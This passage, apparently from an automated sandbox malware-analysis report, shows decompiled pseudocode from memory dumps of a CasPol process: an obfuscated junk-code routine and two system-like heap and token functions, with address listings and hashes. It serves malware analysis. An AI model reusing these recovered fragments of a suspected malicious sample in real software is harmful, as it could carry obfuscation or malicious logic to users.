				_t66 = _t65 ^  *0xd11b3805;
				asm("rcl dword [0xa1cafd33], 0xf");
				asm("adc [0x7e84b4cf], esi");
				_t42 = (_t39 + 0xd8f96164 | 0x000000e2) - 1;
				 *0xae1227fc =  *0xae1227fc + _t63;
				 *0x1277eeda =  *0x1277eeda >> 0x31;
				if(_t33 == 0xe896e921) {
					__eax = __eax ^  *0xb9e06975;
					__ebp = __ebp -  *0x874a513e;
					asm("adc bh, [0x9915ad34]");
					_t28 = __ecx;
					__ecx =  *0xf14c3e26;
					 *0xf14c3e26 = _t28;
					 *0xaeff63d7 =  *0xaeff63d7 >> 0x1c;
					asm("sbb dh, 0xb3");
					_push(__ebx);
					if(__esi >= 0) {
						 *0x5dca2772 =  *0x5dca2772 - __ebp;
						asm("movsw");
						 *0x5f11cce4 = __dh;
						__edi = __edi - 1;
						__ebx = __ebx | 0x587d12ee;
						 *0xddd0401b =  *0xddd0401b >> 0x5d;
						L1();
						asm("adc ebp, [0x2e0215e8]");
						asm("sbb dl, 0x0");
						if( *0xddd0401b < 0) {
							__edx = __edx +  *0x6dd38b71;
							asm("stosd");
							__ebx = __ebx - 1;
							asm("cmpsw");
							__edi = __edi +  *0x36e532dc;
							asm("sbb al, [0xbaec0330]");
							 *0x69dc11f =  *0x69dc11f ^ __esp;
							__edi = __edi +  *0xcede2edc;
							__eax =  *0x6424586a * 0x9a98;
							asm("stosd");
							__ecx = __ecx - 1;
						}
					}
				}
				L1:
				_t42 = _t42 + 0x4044a4c7;
				asm("sbb dh, [0x448f6410]");
				_t60 = _t60 +  *0xfd6804f7;
				L1();
				_t36 = _t36 +  *0x4505d66;
				if(_t36 > 0) {
					 *0xf29b0476 =  *0xf29b0476 & _t36;
					 *0xc6faa32 =  *0xc6faa32 + _t33;
					if( *0xc6faa32 <= 0) {
						 *0xdd024877 =  *0xdd024877 & _t60;
						_t7 = _t33;
						_t33 =  *0x425540d7;
						 *0x425540d7 = _t7;
						_push(_t63);
						if( *0xdd024877 < 0) {
							_t60 = _t60 |  *0x20946671;
							asm("adc [0xc19767d5], edx");
							_push(0xe1c522ec);
							 *0xd830f51a =  *0xd830f51a ^ _t42;
							 *0x5128aeb3 =  *0x5128aeb3 + _t42;
							 *0xe1394881 =  *0xe1394881 + _t62;
							if(( *0x12fcafbb & 0x868d36f0) < 0) {
								asm("adc esi, 0xd2bb676d");
								 *0xd3fe81d1 =  *0xd3fe81d1 << 0xd3;
								asm("sbb edx, [0x70e392cf]");
								asm("adc edi, 0xbeb73a37");
								 *0xa69ded3e = _t62;
								_t42 = _t42 | 0x000000f2;
								asm("movsb");
								 *0xf976a99 =  *0xf976a99 - _t42;
								asm("scasd");
								_pop(_t34);
								_push( *0x2cc1f27d * 0x1799 - 0x9226e9);
								_t63 = _t63 + 1;
								 *0xc6f3fb94 =  *0xc6f3fb94 >> 0x1f;
								_t62 = _t62 + 0xe14d5af7;
								asm("ror dword [0xc49844cf], 0xc2");
								asm("adc ecx, 0xbfeceb07");
								asm("rcr dword [0x98ef2c6f], 0xcf");
								_t33 = _t34 & 0x03955083;
								_t66 = _t66 + 0xcf13d83e;
								 *0x623d31c7 =  *0x623d31c7 + _t62;
								if( *0x623d31c7 > 0) {
									_t63 =  *0x9683ed76;
									_t33 = _t33 |  *0x9d81c308;
									 *0x5ebc2f93 =  *0x5ebc2f93 << 0x52;
									 *0x70307ac2 = _t36;
									 *0x6ae5bf04 = _t36;
									 *0xc5784922 =  *0xc5784922 ^ _t36;
									asm("sbb ebx, [0x212cc8bd]");
									_t12 = _t42;
									_t42 =  *0x447c9036;
									 *0x447c9036 = _t12;
									if( *0xc5784922 == 0) {
										 *0x4186d9ed =  *0x4186d9ed | _t42;
										 *0x8e57f3d7 =  *0x8e57f3d7 + _t42;
										_pop(_t53);
										_t54 = _t53 +  *0x73e6a806;
										_pop(_t63);
										_t60 = _t60 |  *0xad6f3ec7;
										 *0x6ce3e128 =  *0x6ce3e128 << 0x4f;
										asm("sbb edx, 0x27eea2c4");
										_t66 = _t66 |  *0x71601ece;
										 *0x53689cd3 =  *0x53689cd3 >> 0x33;
										if(( *0x2a9b886c & _t60) >= 0) {
											asm("rol byte [0xf026b93c], 0xcf");
											asm("lodsb");
											_t60 = _t60 +  *0x58bf6bdd;
											_pop(_t44);
											_push( *0x5c86a0ff);
											_t63 =  *0x32016da3;
											asm("lodsd");
											asm("adc [0x9e374984], cl");
											_t55 = _t54 +  *0x4696add0;
											_t36 =  *0xdfd1626e;
											_t42 = (_t44 | 0x01a88d9a) -  *0x81117f0a;
											 *0x7ae6b800 =  *0x7ae6b800 >> 0xeb;
											asm("rcl byte [0xbe7a8d2], 0xd4");
											asm("cmpsb");
											 *0x5aad772d =  *0x5aad772d << 0xe5;
											_push( *0xd2e2a37);
											if( *0x5aad772d < 0) {
												 *0x37ae98f0 =  *0x37ae98f0 & _t55;
												asm("adc cl, 0x2a");
												asm("sbb esp, 0x1b78f326");
												_t36 = _t36 & 0x6b53dcb8;
												asm("scasb");
												_pop(_t47);
												_push(0x6eeab0a9);
												asm("ror dword [0x99e9050f], 0x65");
												_t42 = _t47;
												 *0xc31e7cbd =  *0xc31e7cbd << 0x61;
												 *0x1afa09ff =  *0x1afa09ff << 0x9c;
												if( *0x1afa09ff >= 0) {
													_t63 =  *0xaef3557c * 0x3f69;
													if(_t63 == 0) {
														_pop( *0x3680c275);
														 *0x768d3dc6 =  *0x768d3dc6 | _t42;
														 *0x39efe7bf =  *0x39efe7bf << 0xc0;
														 *0x6144721c =  *0x6144721c << 0xc1;
														if( *0x6144721c == 0) {
															_push(0x7656ac75);
															_t36 = _t36 &  *0x62ea9fb1;
															_t27 = _t33;
															_t33 =  *0x7b4b058c;
															 *0x7b4b058c = _t27;
															if(_t36 <= 0) {
																 *0xf16e17b8 =  *0xf16e17b8 << 0x58;
																 *0xa5767af2 =  *0x11a1807f * 0x48e0;
																_t42 = _t42 -  *0x5c76028d;
																_t60 = _t60 -  *0x62ff57d3;
																_t36 = 0xed662cda;
																 *0x2a630d97 =  *0x2a630d97 >> 0xbd;
																_t56 = _t55 - 0xe4;
																if(_t56 >= 0) {
																	asm("rol dword [0x52e32a78], 0x19");
																	asm("adc bl, 0xb6");
																	 *0xbe9dc7ed =  *0xbe9dc7ed | _t63;
																	 *0xd6aac80b =  *0xd6aac80b >> 0x4c;
																	 *0xb80ca632 =  *0xb80ca632 ^ (_t56 + 0x6a953539 | 0xaf3961a3);
																	_pop( *0x39a9c2ff);
																	 *0xca3ff0bc =  *0xca3ff0bc << 2;
																	asm("adc bl, 0xe7");
																	asm("ror byte [0x8e433510], 0x79");
																	asm("lodsd");
																	_t33 = _t33 ^  *0xbb669291 ^ 0x7712c22d;
																	asm("sbb esp, [0xbe39aec0]");
																	asm("adc bl, 0x38");
																	_t36 = 0xed662cda &  *0x52569bca;
																	_t42 = _t42 & 0x00000014;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}




















                                                                        0x00423220
                                                                        0x00423225
                                                                        0x00423226
                                                                        0x0042322d
                                                                        0x00423233
                                                                        0x00423239
                                                                        0x0042323f
                                                                        0x0042324c
                                                                        0x00423255
                                                                        0x00423256
                                                                        0x0042325c
                                                                        0x00423268
                                                                        0x0042326e
                                                                        0x00423274
                                                                        0x0042327a
                                                                        0x00423280
                                                                        0x00423280
                                                                        0x00423280
                                                                        0x00423286
                                                                        0x0042328d
                                                                        0x00423290
                                                                        0x00423297
                                                                        0x0042329d
                                                                        0x004232a3
                                                                        0x004232a5
                                                                        0x004232ab
                                                                        0x004232ac
                                                                        0x004232b2
                                                                        0x004232b9
                                                                        0x004232be
                                                                        0x004232c4
                                                                        0x004232c7
                                                                        0x004232cd
                                                                        0x004232d3
                                                                        0x004232d4
                                                                        0x004232d5
                                                                        0x004232e3
                                                                        0x004232e9
                                                                        0x004232ef
                                                                        0x004232f5
                                                                        0x004232fb
                                                                        0x00423305
                                                                        0x00423306
                                                                        0x00423306
                                                                        0x004232c7
                                                                        0x00423297
                                                                        0x00422ebf
                                                                        0x00422ed1
                                                                        0x00422ed7
                                                                        0x00422ee3
                                                                        0x00422ee9
                                                                        0x00422efa
                                                                        0x00422f00
                                                                        0x00422f02
                                                                        0x00422f08
                                                                        0x00422f0e
                                                                        0x00422f10
                                                                        0x00422f16
                                                                        0x00422f16
                                                                        0x00422f16
                                                                        0x00422f1c
                                                                        0x00422f1d
                                                                        0x00422f1f
                                                                        0x00422f2b
                                                                        0x00422f31
                                                                        0x00422f36
                                                                        0x00422f3c
                                                                        0x00422f42
                                                                        0x00422f4e
                                                                        0x00422f65
                                                                        0x00422f6b
                                                                        0x00422f72
                                                                        0x00422f78
                                                                        0x00422f7e
                                                                        0x00422f84
                                                                        0x00422f8d
                                                                        0x00422f8e
                                                                        0x00422f94
                                                                        0x00422f95
                                                                        0x00422f96
                                                                        0x00422f97
                                                                        0x00422f98
                                                                        0x00422f9f
                                                                        0x00422fa5
                                                                        0x00422fac
                                                                        0x00422fb2
                                                                        0x00422fb9
                                                                        0x00422fbe
                                                                        0x00422fc4
                                                                        0x00422fca
                                                                        0x00422fd0
                                                                        0x00422fd6
                                                                        0x00422fe2
                                                                        0x00422fea
                                                                        0x00422ff0
                                                                        0x00422ff9
                                                                        0x00422fff
                                                                        0x00423005
                                                                        0x00423005
                                                                        0x00423005
                                                                        0x0042300b
                                                                        0x0042301d
                                                                        0x00423023
                                                                        0x00423029
                                                                        0x0042302a
                                                                        0x0042303d
                                                                        0x0042303e
                                                                        0x00423044
                                                                        0x0042304b
                                                                        0x00423051
                                                                        0x00423057
                                                                        0x00423070
                                                                        0x00423083
                                                                        0x0042308a
                                                                        0x00423091
                                                                        0x0042309d
                                                                        0x0042309e
                                                                        0x004230a5
                                                                        0x004230ab
                                                                        0x004230ac
                                                                        0x004230b2
                                                                        0x004230b8
                                                                        0x004230c4
                                                                        0x004230ca
                                                                        0x004230d1
                                                                        0x004230d8
                                                                        0x004230d9
                                                                        0x004230e0
                                                                        0x004230e6
                                                                        0x004230f2
                                                                        0x004230f8
                                                                        0x004230fb
                                                                        0x00423101
                                                                        0x00423107
                                                                        0x00423108
                                                                        0x00423109
                                                                        0x0042310e
                                                                        0x00423115
                                                                        0x00423118
                                                                        0x0042311f
                                                                        0x00423126
                                                                        0x0042312c
                                                                        0x00423136
                                                                        0x0042313c
                                                                        0x00423142
                                                                        0x00423148
                                                                        0x0042314f
                                                                        0x00423156
                                                                        0x0042315c
                                                                        0x00423161
                                                                        0x00423167
                                                                        0x00423167
                                                                        0x00423167
                                                                        0x0042316d
                                                                        0x0042317d
                                                                        0x00423184
                                                                        0x0042318a
                                                                        0x00423190
                                                                        0x00423196
                                                                        0x0042319c
                                                                        0x004231a3
                                                                        0x004231a6
                                                                        0x004231ac
                                                                        0x004231b9
                                                                        0x004231c2
                                                                        0x004231ce
                                                                        0x004231d5
                                                                        0x004231db
                                                                        0x004231e1
                                                                        0x004231e8
                                                                        0x004231eb
                                                                        0x00423202
                                                                        0x00423203
                                                                        0x00423208
                                                                        0x0042320e
                                                                        0x00423211
                                                                        0x00423217
                                                                        0x00423217
                                                                        0x004231a6
                                                                        0x0042316d
                                                                        0x00423156
                                                                        0x00423136
                                                                        0x00423126
                                                                        0x004230e6
                                                                        0x00423070
                                                                        0x0042300b
                                                                        0x00422fca
                                                                        0x00422f4e
                                                                        0x00422f1d
                                                                        0x00422f0e
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: da59adba05534ef752beabad9a94672afba0b89ca2e35ef39f75193d74d64d0d
                                                                        • Instruction ID: 5ad36da0b66271df10871577adf4d074f67d7f2fbf4e1e217e99ca9f372f47b0
                                                                        • Opcode Fuzzy Hash: da59adba05534ef752beabad9a94672afba0b89ca2e35ef39f75193d74d64d0d
                                                                        • Instruction Fuzzy Hash: CFA1D7729093A4DFE312DF38E946B163BB5F352720B48470ED8A1472C2D7B8161ADF4A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E138B Relevance: .2, Instructions: 206COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E013E138B(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				signed int _t97;
				signed int _t102;
				void* _t105;
				char* _t112;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				signed int* _t122;
				signed int _t124;
				signed int _t130;
				signed int _t136;
				char _t150;
				intOrPtr _t153;
				signed int _t161;
				signed int _t163;
				signed int _t170;
				signed int _t175;
				signed int _t176;
				signed int _t182;
				signed int* _t183;
				signed int* _t184;

				_t182 = __ecx;
				_t153 = _a24;
				_t183 = __edx;
				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
				_t97 = _t153 - _a16;
				if(_t97 > 0xfffff000) {
					L19:
					return 0;
				}
				asm("cdq");
				_t150 = _a20;
				_v16 = _t97 / 0x1000;
				_t102 = _a4 + 0x00000007 & 0xfffffff8;
				_t170 = _t102 + __edx;
				_v20 = _t102 >> 0x00000003 & 0x0000ffff;
				_t105 = _t170 + 0x28;
				_v12 = _t170;
				if(_t105 >= _t150) {
					if(_t105 >= _t153) {
						goto L19;
					}
					_v8 = _t170 - _t150 + 8;
					_push(E013E0678(__ecx, 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push( &_a20);
					_push(0xffffffff);
					if(E013F9660() < 0) {
						 *((intOrPtr*)(_t182 + 0x214)) =  *((intOrPtr*)(_t182 + 0x214)) + 1;
						goto L19;
					}
					if(E013D7D50() == 0) {
						_t112 = 0x7ffe0380;
					} else {
						_t112 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t112 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0147138A(_t150, _t182, _a20, _v8, 3);
					}
					_t150 = _a20 + _v8;
					_t153 = _a24;
					_a20 = _t150;
				}
				_t183[0] = 1;
				_t113 = _t153 - _t150;
				_t183[1] = 1;
				asm("cdq");
				_t175 = _t113 % 0x1000;
				_v28 = _t113 / 0x1000;
				 *_t183 = _v20;
				_t183[1] =  *(_t182 + 0x54);
				if((_v24 & 0x00001000) != 0) {
					_t117 = E013E16C7(1, _t175);
					_t150 = _a20;
					_t183[0xd] = _t117;
				}
				_t183[0xb] = _t183[0xb] & 0x00000000;
				_t176 = _v12;
				_t183[3] = _a12;
				_t119 = _a16;
				_t183[7] = _t119;
				_t161 = _v16 << 0xc;
				_t183[6] = _t182;
				_t183[0xa] = _t119 + _t161;
				_t183[8] = _v16;
				_t122 =  &(_t183[0xe]);
				_t183[2] = 0xffeeffee;
				_t183[9] = _t176;
				 *((intOrPtr*)(_t182 + 0x1e8)) =  *((intOrPtr*)(_t182 + 0x1e8)) + _t161;
				 *((intOrPtr*)(_t182 + 0x1e4)) =  *((intOrPtr*)(_t182 + 0x1e4)) + _t161;
				_t122[1] = _t122;
				 *_t122 = _t122;
				if(_t183[6] != _t183) {
					_t124 = 1;
				} else {
					_t124 = 0;
				}
				_t183[1] = _t124;
				 *(_t176 + 4) =  *_t183 ^  *(_t182 + 0x54);
				if(_t183[6] != _t183) {
					_t130 = (_t176 - _t183 >> 0x10) + 1;
					_v24 = _t130;
					if(_t130 >= 0xfe) {
						_push(_t161);
						_push(0);
						E0147A80D(_t183[6], 3, _t176, _t183);
						_t150 = _a20;
						_t176 = _v12;
						_t130 = _v24;
					}
				} else {
					_t130 = 0;
				}
				 *(_t176 + 6) = _t130;
				E013DB73D(_t182, _t183, _t150 - 0x18, _v28 << 0xc, _t176,  &_v8);
				if( *((intOrPtr*)(_t182 + 0x4c)) != 0) {
					_t183[0] = _t183[0] ^  *_t183 ^ _t183[0];
					 *_t183 =  *_t183 ^  *(_t182 + 0x50);
				}
				if(_v8 != 0) {
					E013DA830(_t182, _v12, _v8);
				}
				_t136 = _t182 + 0xa4;
				_t184 =  &(_t183[4]);
				_t163 =  *(_t136 + 4);
				if( *_t163 != _t136) {
					_push(_t163);
					_push( *_t163);
					E0147A80D(0, 0xd, _t136, 0);
				} else {
					 *_t184 = _t136;
					_t184[1] = _t163;
					 *_t163 = _t184;
					 *(_t136 + 4) = _t184;
				}
				 *((intOrPtr*)(_t182 + 0x1f4)) =  *((intOrPtr*)(_t182 + 0x1f4)) + 1;
				return 1;
			}































                                                                        0x013e139f
                                                                        0x013e13a1
                                                                        0x013e13a4
                                                                        0x013e13a6
                                                                        0x013e13ab
                                                                        0x013e13b3
                                                                        0x01425522
                                                                        0x00000000
                                                                        0x01425522
                                                                        0x013e13b9
                                                                        0x013e13c1
                                                                        0x013e13c4
                                                                        0x013e13cd
                                                                        0x013e13d0
                                                                        0x013e13d9
                                                                        0x013e13dc
                                                                        0x013e13df
                                                                        0x013e13e4
                                                                        0x0142552b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01425534
                                                                        0x0142553f
                                                                        0x01425545
                                                                        0x01425549
                                                                        0x0142554a
                                                                        0x0142554f
                                                                        0x01425550
                                                                        0x01425559
                                                                        0x0142551c
                                                                        0x00000000
                                                                        0x0142551c
                                                                        0x01425562
                                                                        0x01425574
                                                                        0x01425564
                                                                        0x0142556d
                                                                        0x0142556d
                                                                        0x0142557c
                                                                        0x01425597
                                                                        0x01425597
                                                                        0x0142559f
                                                                        0x014255a2
                                                                        0x014255a5
                                                                        0x014255a5
                                                                        0x013e13ec
                                                                        0x013e13f2
                                                                        0x013e13f4
                                                                        0x013e13f8
                                                                        0x013e13fe
                                                                        0x013e1400
                                                                        0x013e1406
                                                                        0x013e1412
                                                                        0x013e1419
                                                                        0x014255b0
                                                                        0x014255b5
                                                                        0x014255b8
                                                                        0x014255b8
                                                                        0x013e1425
                                                                        0x013e1429
                                                                        0x013e142c
                                                                        0x013e142f
                                                                        0x013e1432
                                                                        0x013e1435
                                                                        0x013e143a
                                                                        0x013e143d
                                                                        0x013e1443
                                                                        0x013e1446
                                                                        0x013e1449
                                                                        0x013e1450
                                                                        0x013e1453
                                                                        0x013e1459
                                                                        0x013e145f
                                                                        0x013e1462
                                                                        0x013e1467
                                                                        0x013e14fa
                                                                        0x013e146d
                                                                        0x013e146d
                                                                        0x013e146d
                                                                        0x013e146f
                                                                        0x013e1479
                                                                        0x013e1480
                                                                        0x013e1507
                                                                        0x013e1508
                                                                        0x013e1510
                                                                        0x014255c1
                                                                        0x014255c2
                                                                        0x014255cc
                                                                        0x014255d1
                                                                        0x014255d4
                                                                        0x014255d7
                                                                        0x014255d7
                                                                        0x013e1482
                                                                        0x013e1482
                                                                        0x013e1482
                                                                        0x013e1484
                                                                        0x013e149b
                                                                        0x013e14a4
                                                                        0x013e14ae
                                                                        0x013e14b4
                                                                        0x013e14b4
                                                                        0x013e14ba
                                                                        0x013e14c4
                                                                        0x013e14c4
                                                                        0x013e14c9
                                                                        0x013e14cf
                                                                        0x013e14d2
                                                                        0x013e14d7
                                                                        0x014255df
                                                                        0x014255e0
                                                                        0x014255ea
                                                                        0x013e14dd
                                                                        0x013e14dd
                                                                        0x013e14df
                                                                        0x013e14e2
                                                                        0x013e14e4
                                                                        0x013e14e4
                                                                        0x013e14e7
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                                        • Instruction ID: e45747c05cd5f3fd21fa4e51aacce74e427c485ee5679ce4646b1e9119e0b1fb
                                                                        • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                                        • Instruction Fuzzy Hash: F281AA71A003559FCB24CF68C444BEABBF5EF48304F14856AE956CB791D330EA81CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0144B8D0 Relevance: .2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 39%
                                                                        			E0144B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x14a7b9c; // 0x0
				_t124 = L013D4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E013F9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E013F95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E013F95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L013D77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E013F9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E013F95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x14a7b9c; // 0x0
									_t92 = L013D4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E013F9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E013BA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0144E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0144E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E013F95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                        0x0144b8d9
                                                                        0x0144b8e4
                                                                        0x00000000
                                                                        0x0144b8e6
                                                                        0x0144b8f3
                                                                        0x0144b8f5
                                                                        0x0144b8f5
                                                                        0x0144b8f8
                                                                        0x0144b920
                                                                        0x0144b924
                                                                        0x0144b936
                                                                        0x0144b939
                                                                        0x0144b93d
                                                                        0x0144b948
                                                                        0x0144b9a0
                                                                        0x0144b9a0
                                                                        0x0144b9a4
                                                                        0x0144b9bf
                                                                        0x0144b9c4
                                                                        0x0144b9c6
                                                                        0x0144b9cd
                                                                        0x0144b9d1
                                                                        0x0144bad4
                                                                        0x0144bad8
                                                                        0x0144bada
                                                                        0x0144badc
                                                                        0x0144badc
                                                                        0x0144badf
                                                                        0x0144bae0
                                                                        0x0144bae2
                                                                        0x0144bae4
                                                                        0x0144baec
                                                                        0x0144baee
                                                                        0x0144baf0
                                                                        0x0144baf0
                                                                        0x0144baec
                                                                        0x0144bafb
                                                                        0x0144bafc
                                                                        0x0144bafe
                                                                        0x0144bb01
                                                                        0x0144bb01
                                                                        0x00000000
                                                                        0x0144bb06
                                                                        0x0144b9d7
                                                                        0x0144b9db
                                                                        0x0144b9db
                                                                        0x0144b9de
                                                                        0x0144b9de
                                                                        0x0144b9e4
                                                                        0x0144b9e7
                                                                        0x0144b9ea
                                                                        0x0144b9ec
                                                                        0x0144b9ef
                                                                        0x0144b9f3
                                                                        0x0144ba1b
                                                                        0x0144ba1b
                                                                        0x0144ba23
                                                                        0x0144ba24
                                                                        0x0144ba27
                                                                        0x0144ba2a
                                                                        0x0144ba2b
                                                                        0x0144ba2e
                                                                        0x0144ba30
                                                                        0x0144ba37
                                                                        0x0144ba3f
                                                                        0x0144ba9c
                                                                        0x0144baa2
                                                                        0x0144bb13
                                                                        0x0144bb15
                                                                        0x0144baae
                                                                        0x0144baae
                                                                        0x0144bab3
                                                                        0x0144bab5
                                                                        0x0144baba
                                                                        0x0144bac8
                                                                        0x0144bac8
                                                                        0x0144baba
                                                                        0x0144bacd
                                                                        0x0144bacf
                                                                        0x00000000
                                                                        0x0144bacf
                                                                        0x0144bb1a
                                                                        0x00000000
                                                                        0x0144bb1c
                                                                        0x0144baa7
                                                                        0x0144bb11
                                                                        0x00000000
                                                                        0x0144bb11
                                                                        0x0144baa9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0144ba41
                                                                        0x0144ba41
                                                                        0x0144ba41
                                                                        0x0144ba58
                                                                        0x0144ba5d
                                                                        0x0144ba62
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0144ba64
                                                                        0x0144ba67
                                                                        0x0144ba68
                                                                        0x0144ba69
                                                                        0x0144ba6c
                                                                        0x0144ba6f
                                                                        0x0144ba71
                                                                        0x0144ba78
                                                                        0x0144ba80
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0144ba90
                                                                        0x0144ba90
                                                                        0x0144ba97
                                                                        0x00000000
                                                                        0x0144ba97
                                                                        0x0144b9f5
                                                                        0x0144b9f7
                                                                        0x0144b9f7
                                                                        0x0144b9fa
                                                                        0x0144ba03
                                                                        0x0144ba07
                                                                        0x0144ba0c
                                                                        0x0144ba10
                                                                        0x0144ba17
                                                                        0x00000000
                                                                        0x0144b9f7
                                                                        0x0144b9a6
                                                                        0x0144b9a8
                                                                        0x0144b9af
                                                                        0x0144b9b3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0144b9b9
                                                                        0x00000000
                                                                        0x0144b9b9
                                                                        0x0144b94d
                                                                        0x0144b98f
                                                                        0x0144b995
                                                                        0x0144b999
                                                                        0x0144b960
                                                                        0x0144b967
                                                                        0x0144b968
                                                                        0x0144b96a
                                                                        0x00000000
                                                                        0x0144b96a
                                                                        0x0144b99b
                                                                        0x0144b99e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0144b99e
                                                                        0x0144b951
                                                                        0x0144b954
                                                                        0x0144b95a
                                                                        0x0144b95e
                                                                        0x0144b972
                                                                        0x0144b979
                                                                        0x0144b97d
                                                                        0x0144b97f
                                                                        0x0144b980
                                                                        0x0144b982
                                                                        0x0144b984
                                                                        0x00000000
                                                                        0x0144b984
